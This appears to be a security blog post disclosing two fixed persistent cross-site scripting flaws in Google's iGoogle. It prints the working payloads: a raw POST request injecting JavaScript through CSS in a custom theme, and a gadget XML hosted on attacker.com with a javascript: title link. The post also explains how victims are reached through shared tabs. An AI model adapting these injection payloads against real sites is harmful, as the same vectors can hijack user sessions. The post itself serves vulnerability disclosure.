Kos SecurityA blog about security.

Hacking Google – Part 2

Vulnerability: Cross Site Scripting

Affects: Any browser that supports javascript to be executed from CSS. IE6, IE7, and the latest version of Opera were tested.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via CSS injection on a custom theme.

Authentication Status: both unauth and auth

 

URL used in attack
http://www.google.com/ig

 

Payload:
POST /ig/skin_submit_xhr?tmprivacy=1&et=4cdb0f0bQKHcNSc5&referrer=tm HTTP/1.1

{"title":"test","author":"test","description":"","skin":
        [{"background_image":"');}body{background-image:expression(alert(document.domain));
        -o-link:'javascript:alert(document.domain)';-o-link-source:current}/*","logo_color":"white","logo_hex_color":"FFFFFF",
        "background_color":"D1ECF9","gadget_border":"6685b8","gadget_top_background":"6685b8",
        "gadget_top_text":"CEECFC","tab_background":"D1ECF9","tab_border":"93BDD1",
        "tab_text":"3A5787","selected_text":"3A5787","gadget_icon":"00a9ff","icon_color":"00a9ff"}]}

How it’s reflected on the page:

When the iGoogle page is loaded, if theme (which is attached to a tab) is selected, it will trigger instantly.
If the tab is not selected, if a user selects the tab, it will then trigger.

GET /ig/skin_xml_to_css?hl=en&gl=us&v2=1&url=http://www.google.com/ig/tm%3Foutput%3Dxml%26te%3DFYvZBahVsoU&skindx=ix:0&fp=lUTDcevwYRs HTTP/1.1

....');}body{background-image:expression(alert(document.domain));-o-link:'javascript:alert(document.domain)';
-o-link-source:current}@import 'data:,*{x:expression(alert(document.domain))}';/*') no-repeat top center;}/* google logo */....

The Danger

A user can share a tab with other users via invitation. If the victim accepts the tab invitation, then the theme with the attached malicious CSS will be added to their page.

Resolution

This issue was resolved in about a week.

Hacking Google – Part 1

Vulnerability: Cross Site Scripting

Affects: all browsers.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.

Authentication Status: both unauth and auth

 

URL used in attack
http://www.google.com/ig/adde?moduleurl=attacker.com/payload.xml&source=lpep&mkhp=0

attacker.com/payload.xml:
<ModulePrefs author="Kyle" author_email=""
        description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
        screenshot="http://www.google.com/images/firefox/sprite2.png"
        title_url="javascript:alert(document.domain);"  title="[TITLE OF GADGET]" height="165">
        <Require feature="setprefs" />
        <Require feature="views" />
        <Require feature="dynamic-height" />
....
</ModulePrefs>

How it’s reflected on the page:

....
<a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a>
....
(The "Hax" string below is the title of the gadget, which was what the reflected link above is)

Resolution

This issue was resolved very quickly.
Google now just replaces anything that doesn’t have a protocol of http or https with the path the file is hosted on.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/